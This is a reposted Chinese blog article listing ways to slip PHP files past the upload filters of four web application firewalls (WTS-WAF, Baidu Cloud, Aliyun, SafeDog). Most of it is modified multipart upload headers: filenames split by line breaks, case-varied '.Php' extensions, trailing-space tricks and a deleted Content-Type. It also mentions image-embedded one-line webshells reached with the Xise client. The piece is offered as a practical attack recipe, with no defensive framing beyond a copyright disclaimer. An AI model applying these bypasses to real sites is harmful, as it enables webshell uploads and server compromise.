上传绕过WAF几种常见的姿势

本文转载自查看原文 2017-05-16 15:05 2807 上传突破绕过

1：WTS-WAF 绕过上传
原内容：
Content-Disposition: form-data; name="up_picture"; filename="xss.php"
添加回车
Content-Disposition: form-data; name="up_picture"; filename="xss.ph
p"

2：百度云上传绕过见下：
百度云绕过就简单的很多很多，在对文件名大小写上面没有检测php是过了的，Php就能过，或者PHP，一句话自己合成图片马用Xise连接即可。
Content-Disposition: form-data; name="up_picture"; filename="xss.jpg .Php"
3：阿里云上传绕过见下：
源代码：
Content-Disposition: form-data; name="img_crop_file"; filename="1.jpg .Php"Content-Type: image/jpeg
修改如下：
Content-Disposition: form-data; name="img_crop_file"; filename="1.php"
没错，将=号这里回车删除掉Content-Type: image/jpeg即可绕过。
4：安全狗上传绕过见下：
源代码:
Content-Disposition: form-data; name="image"; filename="085733uykwusqcs8vw8wky.png"Content-Type: image/png
绕过内容如下：
Content-Disposition: form-data; name="image"; filename="085733uykwusqcs8vw8wky.png
C.php"
删除掉ontent-Type: image/jpeg只留下c，将.php加c后面即可，但是要注意额，双引号要跟着c.php".

免责声明！

本站转载的文章为个人学习借鉴使用，本站对版权不负任何法律责任。如果侵犯了您的隐私权益，请联系本站邮箱yoyou2525@163.com删除。

猜您在找 上传绕过WAF几种常见的姿势常见WAF绕过思路文件上传漏洞（绕过姿势） Upfile的几种常见姿势 SQL注入绕过waf的一万种姿势浅谈WAF几种常见的部署模式渗透之路 WAF Bypass【第一篇】常见WAF及防护绕过原理云WAF绕过方法 WAF的基础绕过 SQLMap绕过WAF